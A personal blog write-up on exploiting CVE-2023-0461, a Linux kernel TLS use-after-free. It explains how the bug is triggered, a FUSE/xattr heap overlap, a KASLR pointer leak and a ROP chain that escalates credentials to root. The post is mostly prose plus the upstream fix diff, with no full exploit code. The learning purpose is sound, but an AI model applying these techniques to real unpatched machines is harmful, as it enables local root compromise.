At the tender young age of 36 I decided to write my first exploit. Because I have been writing Linux kernel tests and bug reproducers for years, it looked like a good idea to target the Linux kernel.
The Linux kernel is probably the hardest thing I can expect to exploit in a reasonable time. I know less about browser internals and other things which appear to enjoy the same level of competition.
The payoff here being insight into what it takes rather than a direct monetary reward.
I chose to exploit a bug that was previously used in Google’s kernelCTF. It’s not a trendy bug with a marketing team. It’s just known by the name CVE-2023-0461. I chose it because it was the first bug in Google’s spreadsheet.
I don’t like the idea of exploiting fake bugs or bugs in older kernels without most of today’s mitigations. However I didn’t want to target a bug that has never been exploited.
I wanted to know for certain that overall exploitation was possible. Otherwise I could get discouraged and give up on a bug when actually I would learn an important lesson from pushing through.
Regardless of what I do next, I think it was well worth the effort to get this working.
This isn’t a rigorous write-up on a new technique or a zero-day. It’s just my thoughts on the exploitation. Nonetheless it contains many technical details, a lot of which will be difficult to follow unless you are already very familiar with the subject matter.
I have created a video on the last part of the exploit covering the ROP chain. I had the intention of covering the other sections to, but when I started trying to step through those bits it got very disjointed and confused. I may come back to those, perhaps after I come up with a better solution for the heap spray. Perhpas not.
I’m really stretching the Zig theme here, but yes the exploit is written in Zig. It’s terrible Zig code, I made no effort to clean it up. However there is now a Linux kernel exploit written in Zig.
I would speculate that Zig is an attractive language for exploit writers. For precisely the same reasons its attractive for writing embedded and system code. However there is no evidence of that presented here.
Note that more usefully there is also an LTP test which reproduces the bug. The Linux Test Project has a number of such tests.
The bug
The bug is in the “User Level Protocol” (ULP for short) layer on top of TCP sockets. In theory all ULPs are vulnerable, but I only looked at TLS.
The Linux TLS module allows applications to offload some processing to the kernel or hardware. Once you have established a TCP connection and done the public key cryptography bit then the ULP allows you to offload the synchronous cryptographic stage to the kernel.
The bug was originally exploited (probably) by “D3v17 - savy@syst3mfailure.io”. They used it against the mitigation bypass target in Google’s kernelCTF. I’m looking at their exploit and write-up for the first time now and it is mostly a mystery to me.
The steps to reproduce the bug are the same, but that is where the similarities end. They didn’t resort to using FUSE and instead found a way to get their hands on those elastic objects, I keep hearing about.
We’ll come back to how annoyed I am at using FUSE later. For now lets look at my description of the bug which I wrote for the LTP test.
Reproducer for CVE-2023-0461 which is an exploitable use-after-free in a TLS socket. In fact it is exploitable in any User Level Protocol (ULP) which does not clone its context when accepting a connection.
Because it does not clone the context, the child socket which is created on accept has a pointer to the listening socket’s context. When the child is closed the parent’s context is freed while it still has a reference to it.
TLS can only be added to a socket which is connected. Not listening or disconnected, and a connected socket can not be set to listening. So we have to connect the socket, add TLS, then disconnect, then set it to listening.
To my knowledge, setting a socket from open to disconnected requires a trick; we have to “connect” to an unspecified address. This could explain why the bug was not found earlier.
The accepted fix was to disallow listening on sockets with a ULP set which does not have a clone function.
It took me a while of scanning the kernel code to find out that the connect system call can be used to disconnect a socket. I reviewed the locations where the socket state is updated and this appears to be the only place that meets the criteria.
This is written in the connect
Linux man pages, but
I wouldn’t have thought to look there because… you know, the name. I
also must have seen this information before, but strangely enough my
initial thought was that this bug is impossible because socket state
transitions are one way.
For stream sockets at least this would match the BSD man pages. I find the POSIX page painful to read, but it doesn’t appear to address calling connect multiple times on a connection mode socket. It is left open to implementation.
This bug is probably a sin
of omission, that is one where the software developer did not
take into account some possible program state. If that is the case
then I would also say that the semantic overloading of
connect
did not help.
Reproducing
I’m not sure how the bug was found, but I was starting with a CVE and fix commit with no reproducer. So the first step is to find a way of reliably reproducing the bug.
Below is the fix commit.
commit 2c02d41d71f90a5168391b6a5f2954112ba2307c
Author: Paolo Abeni <pabeni@redhat.com>
Date: Tue Jan 3 12:19:17 2023 +0100
net/ulp: prevent ULP without clone op from entering the LISTEN status
When an ULP-enabled socket enters the LISTEN status, the listener ULP data
pointer is copied inside the child/accepted sockets by sk_clone_lock().
The relevant ULP can take care of de-duplicating the context pointer via
the clone() operation, but only MPTCP and SMC implement such op.
Other ULPs may end-up with a double-free at socket disposal time.
We can't simply clear the ULP data at clone time, as TLS replaces the
socket ops with custom ones assuming a valid TLS ULP context is
available.
Instead completely prevent clone-less ULP sockets from entering the
LISTEN status.
Fixes: 734942cc4ea6 ("tcp: ULP infrastructure")
Reported-by: slipper <slipper.alive@gmail.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Link: https://lore.kernel.org/r/4b80c3d1dbe3d0ab072f80450c202d9bc88b4b03.1672740602.git.pabeni@redhat.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
index 848ffc3e0239..d1f837579398 100644--- a/net/ipv4/inet_connection_sock.c
+++ b/net/ipv4/inet_connection_sock.c
@@ -1200,12 +1200,26 @@ void inet_csk_prepare_forced_close(struct sock *sk)
}
EXPORT_SYMBOL(inet_csk_prepare_forced_close);
+static int inet_ulp_can_listen(const struct sock *sk)
+{
+ const struct inet_connection_sock *icsk = inet_csk(sk);
+
+ if (icsk->icsk_ulp_ops && !icsk->icsk_ulp_ops->clone)
+ return -EINVAL;
+
+ return 0;
+}
+
int inet_csk_listen_start(struct sock *sk)
{
struct inet_connection_sock *icsk = inet_csk(sk);
struct inet_sock *inet = inet_sk(sk);
int err;
+ err = inet_ulp_can_listen(sk);
+ if (unlikely(err))
+ return err;
+
and then the CVE description which was perhaps updated at some point. I will go with what’s in my notes.
There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.
There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener.
If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege.
So no hint at how one disconnects a TCP socket and actually we
need more than that. We want to set the lower level socket state to
SS_UNCONNECTED
. Otherwise we can’t call listen. This is
different from the TCP level connection.
Disconnecting a TCP socket can be done at least two other ways,
you can close the other end or call shutdown
. However
that won’t set the socket state to SS_UNCONNECTED
unless the connection was never fully established. That will just
set the TCP state to TCP_CLOSE
.
If the connection is never fully established then we can not set
the ULP to TLS. So we need to fully establish the connection then
reset both the socket and TCP states. Which, as I already mentioned,
is done using connect
with an address of
AF_UNSPEC
.
Once we know how to do it then it is relatively straight
forward to reproduce. First we create a connection, calling
setsockopt
on the connected socket to add TLS to it.
Then calling connect
with AF_UNSPEC
to set
SS_UNCONNECTED
and TLS_CLOSE
on the
socket. Finally we call listen
and accept
to accept an incoming connection and close that connection.
When that final connection is closed it will free
tls_context
while the listening socket still has a
reference to it.
There are no race conditions and we could easily trigger the free
multiple times once we have a listening socket with a
tls_context
. No instability comes from this part of the
process.
Heap spray
At this point I knew that a use-after-free is useful for causing a type confusion. That is, the freed memory we still have a pointer to can be reallocated as a different type of object.
More than one type of object then shares the same memory. So that we can corrupt the memory from the POV of one or both of the objects.
The active Linux heap allocator (SLUB), uses various object caches. Some important objects get their own cache. Most however are allocated from general purpose caches of different sizes.
The tls_context
object is allocated in the
kmalloc-512
cache. There are multiple ways to find this
out. Including looking at the size of the struct (328) and what
flags it is allocated with GPF_KERNEL
.
Also by adding slub_debug=T,*-512
to the kernel
command line then doing the allocation we will see which 512 cache
it is in. If we don’t know the size of the struct then debugging
with gdb or tracing with kernel probes can show which cache is
used.
Based on various writeups I had read (sorry I lost track of where
I first saw some things), there are a number of objects, such as
msg_msg
and sk_buff
, that can be allocated
in any cache size and are mostly full of attacker controlled
data.
So I started trying to heap spray these objects, however I didn’t
appear to be getting any hits. Using some of the tracing methods
mentioned above I realised that these objects were being allocated
in kmalloc-cg-512
, not kmalloc-512
.
Looking at their allocations, they use
GFP_KERNEL_ACCOUNT
not GFP_KERNEL
. On the
face of it this flag has something to do with memory counters used
in control groups. However it now also causes objects to be
allocated in a different cache.
This is good for security because a lot of juicy variable length objects containing arbitrary user data are now segregated from everything else.
At this point I knew I could arbitrarily free any object in the
kmalloc-512
cache. I wasn’t sure what to do with that
though. I also know that cross cache attacks are possible, however I
assumed it would be easier to find an object in the same cache. So I
started looking for more objects I could use to replace
msg_msg
.
I became fixated with splice
and
writev
. Firstly because I read about some ancient
attack that hasn’t worked since the introduction of
copy_to/from_user
. I should have known better, but at
least at this point I could see that my heap spray worked.
Secondly I moved onto bio_vec
which is used when
splicing between pipes. Because it can allocate an object in
kmalloc-512
and then block. The problem is the object
is a bio_vec
array which contains pointers to
struct page
. These pages are mapped in just before
use.
I didn’t have anything to pass as a pointer to a
struct page
at this point. I suppose that if I knew any
valid page addresses (or pfn) then this could be used to read or
write to it.
Finding a suitable object was by far not the only problem. To my knowledge the free is delayed by up to 5000 jiffies, which appears to be 5 seconds on the target kernel config.
This is because the context is freed with kfree_rcu
which batches up frees. The maximum batch age is 5000 jiffies and on
my quiet system I would often hit that. I suppose the time could be
reduced by spamming frees, but then that could interfere with other
things.
Throughout the exploit development I would accidentally introduce a change that put the wrong object into the freed slot. In one case I also moved the free and allocation to different processes and therefor different CPUs. Each CPU has its own free list, so this also stopped it from working. It was the main source of instability and confusion.
I have a couple of pages of notes and ideas from this stage. Plus there will be more stuff that I looked into, but didn’t bother to write down. This is the part of the exploit I would most like to revisit.
FUSE
What I did know at this point, was that there was a well
proven heap spray technique using FUSE and extended
file attributes. Originally it was done with
userfaultfd
.
I don’t like this technique because I think it can be easily
mitigated like userfaultfd. It relies on the attacker having access
to /dev/fuse
and either
fusermount
or unprivileged user namespaces.
On a desktop it is quite likely that all users have access to
/dev/fuse
, but the only processes that need access to
this are file system daemons. So there are obvious ways to shutdown
this attack vector.
Having said that, it may not be convenient for desktops to
restrict access to /dev/fuse
. FUSE is extremely useful.
So I don’t see it going away altogether. Unlike
userfaultfd
the absence of which has probably not
bothered many people outside of data centers.
I have written two articles about FUSE already.
The second article is about using the raw FUSE interface which was partially motivated by this exploit.
I found that using the raw FUSE interface I don’t need to use the
mmap
page fault technique described in Chompie’s blog.
Instead of mapping a file and blocking while reading from the file,
I block on processing the xattr
request itself.
I don’t know that I need to use the raw interface for this or that it is the better way to do it. However I wanted to poke at the raw interface and I poked it.
Needless to say it added a fair chunk of time onto the exploitation. Still, using FUSE at least, was the right thing to do because the probability it wouldn’t work was very low.
Using this method I don’t really do heap spray. I just allocate a single xattr after a delay. It usually gets the freed slot so long as the free and the alloc happen on the same CPU. This works on my very quiet VM, but I guess it would not fair so well with more noise.
One last note on FUSE is that there are a lot of FUSE message
types and I would be surprised if the xattr
messages
are the only two of interest to attackers. FUSE gives user land the
ability to pause inside a whole bunch of internal kernel
operations.
KASLR
Now that I could overlap xattr
buffers with
tls_context
I could read the content of
tls_context
. A caveat is that xattr
zeros
its buffer, also zeroing tls_context
. This corrupts
tls_context
because after being initialised it contains
a couple of pointers.
Luckily these pointers are not used much. Without touching them
we are able to set the encryption keys used for transmitting or
receiving using setsockopt
. This writes lots of
interesting things into tls_context
.
One of these things is a function pointer to
tls_sw_push_pending_record
(or
tls_device_push_pending_record
if hardware with TLS
offload is present). We can write this pointer into the
xattr
buffer while blocking the FUSE request. When
setsockopt
returns we can then allow the FUSE request
to continue and read back the internal kernel pointer.
We need a function pointer because of address layout randomisation. If KASLR is enabled then the kernel shifts its address space by some amount. So that every symbol is offset from its default location.
However the symbols are all still in the same order and there are no random gaps introduced between them. So if we retrieve a pointer to a known symbol, then we can calculate the location of any symbol.
RIP
The more sensitive reader may want to turn away now as things are going to get really ROPey.
At last I could read and write to tls_context
. This
doesn’t instantly grant root privileges though. The structure
doesn’t contain a pointer to the process credentials. Plus it’s not
obvious to me how to write to some arbitrary memory just using
tls_context
without hijacking kernel control flow.
Interestingly tls_context
can contain an indirect
reference to the creds via
ctx->priv_ctx_rx->strp.sk->sk_socket->file->f_cred
if we setup encryption for receiving data. I say interesting because
any time we have a socket or sk
pointer we know an
arbitrary read would allow us to find the task creds.
I like the idea of a data only attack, however I didn’t see a clear path to getting arbitrary R/W. I expect it’s totally possible, especially by adding more object types to the type confusion.
With a data only attack I wouldn’t have to use a code reuse attack like ROP or JOP. This seemed attractive for a number of reasons, not least that ROP appeared magical, but also because the chain is specific to a particular kernel binary.
The fact is though that tls_context
provides access
to at least three function pointers which I can overwrite and
execute. So that is three different places where I can try to launch
my attack. I gather this is really good.
That isn’t to say it is easy though, as each location requires different setup to execute. We have to execute the function pointer without crashing the kernel before or afterwards.
Note that, back in the bad old days, I would have just been able
to write some shell code (I don’t know why the word shell
is there, it’s just code) into tls_context
, then point
one of the function pointers at it. This would then get executed
like any other kernel code.
These days the heap memory where tls_context
lives
is not executable. So if we try that the CPU will refuse to execute
it. We can set memory to be executable, but we need code execution
to do it, so there is a chicken and egg issue there.
Hence if we want to take control of execution we have to reuse existing code. The code we want though is something like the following.
// resets credentials to root in the root user namespace
void escalate_privs(void) {
return commit_kernel_creds(prepare_kernel_creds(NULL));
}
If you are writing a kernel, then don’t include a handy function
like this. Indeed Linux does not include such code. This does not
stop us though because of the way the jmp
,
call
and ret
CPU instructions work (for
now).
The call
instruction takes an address, any
executable address, and updates rip
to it after pushing
the current value of rip
to the stack. Meanwhile the
ret
instruction pops the top value off the stack into
rip
.
Updating rip
changes the next instruction the CPU
will execute. Presently there is nothing to stop us from passing an
address to call
which is not the start of a
function.
Likewise ret
will jump to whatever value is at the
top of the stack. Furthermore we can change the location of the
stack, including to heap memory that we control.
So each function has at least one ret
instruction
and we can jump to the instructions just before each
ret
to do whatever. The useful sequence of one or more
instructions in front of each ret
are called a
gadget.
We can put the addresses of gadgets on the stack and the
ret
instructions at the end of each gadget will link
them together. This forms a ROP chain, where ROP stands for Return
Oriented Programming.
That’s not all though, because the various jmp
instructions can also be used to set rip
. There seem to
be a variety of ways in which to construct a JOP gadget. In the end
I just used ROP.
Note that finding ROP and JOP gadgets in general is easy because of the tooling available. Constructing them into a chain is more challenging, although I’m sure a constraint solver or similar could partially automate that as well.
I extracted the gadgets using the method described here. Then constructed the chain by grepping for suitable gadgets. Notably ChatGPT was useful for describing the purpose of basic x86 instructions and registers. It seems to have synthesized the various sources of x86 documentation well.
Initially I was not sure I could use a ROP chain. I knew I had to
change the stack location rsp
, but I wasn’t sure it
would be allowed. This wasn’t an issue though; apparently no
distinction is drawn between stack and heap locations.
Secondly I don’t have the address of tls_context
, I
have addresses to other memory locations within it, but not the
structure itself. There is a pointer to a small amount of memory I
control which is used to store some encryption gubbins, however it
is too small for a ROP chain.
I noted though that if a register contains
tls_context
already then I can move that value into
rsp
using the first gadget. The first items in
tls_context
aren’t used for a lot of operations, so I
can overwrite them with return addresses.
In the middle of tls_context
there are some function
pointers which we want to use to start the ROP chain. So we have to
stack pivot over those. After that there is plenty of space
to store a ROP chain.
The first place I tried to take rip
control turned
out to be a bad spot. Firstly it wanted to use the
tls_context.sk_proto
pointer which had been wiped when
allocating xattr
.
It only wanted one field in sk_proto
, which turned
out to be a function pointer. This wasn’t the function pointer I was
originally targeting, but it was needed to reach the original, so I
targeted it instead.
I couldn’t fake the whole sk_proto
object because it
is too large to fit in the memory I control. However only one field
is accessed at a given offset. So I could fake that one field and
put a pointer in ctx->sk_proto
which is offset by
the distance to the field.
This worked, but then I discovered that I had made a mistake. I
thought that a pointer to tls_context
would be in one
of the registers at the call site which would start the ROP chain.
It turns out that I was looking at a point in the execution just
before the call site.
The register containing the context was cleared just before the
call. So now I didn’t know where the location of my chain was.
Instead of giving up on this path immediately I decided to try
dereferencing the sk
pointer which was in a register
and the sk
structure also contained a pointer to the
context.
I would have to do this with JOP and didn’t grasp how to do that. I think it should be possible using a suitable JOP gadget that jumps to a location specified by a register I control. However I gave up and moved to another location to take RIP control.
This time I tried ctx->push_pending_record
which
can be called by setting
ctx->pending_open_record_frags
to true and sending a
control message with sendmsg
. This isn’t the
only way to call it, but it appears to be the easiest.
I also got lucky because it has the context in the
rax
register and there is a ROP gadget which simply
sets rax
to rsp
. Thus setting the stack to
the context.
Not only that, but I discovered that cmsg
allocates
a variable sized object in GFP_KERNEL
with only a small
bit of header data. Potentially that is a replacement for
xattr
! Although I don’t know how a cmsg
payload could be read back to user space.
Anyway I ignored that and managed to write a ROP chain that calls the necessary functions to set the creds. It’s only a very small amount of code, but it was not easy.
The biggest issue was restoring the stack pointer to its original
value after elevating privileges. I can’t leave the stack pointing
to the context if I want to gracefully return from
push_pending_record
and back to user land.
I couldn’t think of a way to save the rsp
register,
so that it could be restored later. I guess it’s possible with JOP,
but I had already given up on that. It so happened though that 4 of
the registers contained pointers to locations on the original
stack.
It took a while, but I found a simple sequence of gadgets that
calculated the original rsp
value from rbx
and restored it. After that I just had to do something with the
newly gained privileges and that was it, the exploit was
complete.
Writing a ROP chain is rather odd compared to writing plain
assembly. The instructions which immediately appear before a
ret
are constrained by the x86 calling convention. It’s
impossible to find mov
with some pairs of registers for
example. Even if you look at gadgets with multiple instructions, the
compiler just doesn’t produce some things.
On the other hand it is surprising what it does produce. Although
I guess ROPgadget
looks at misaligned
instructions as described in the book Practical Binary
Analysis. So it’s not necessarily the case that the gadgets it
finds are part of the kernel.
Shell
When the exploit successfully returns to user land, it just
starts a shell. When the shell closes the kernel crashes because the
tls_context
is still corrupted and closing the socket
causes some zeroed fields to be accesses. This can be fixed of
course, it just requires more cleanup.
Because of the way I use FUSE the exploit requires unprivileged
user namespaces to mount the FUSE FS. This is only because there is
no fusermount
in my image and my raw FUSE
implementation doesn’t implement something needed to use
fusermount
anyway. Again this could be fixed, but I’d
be more interested in switching away from FUSE.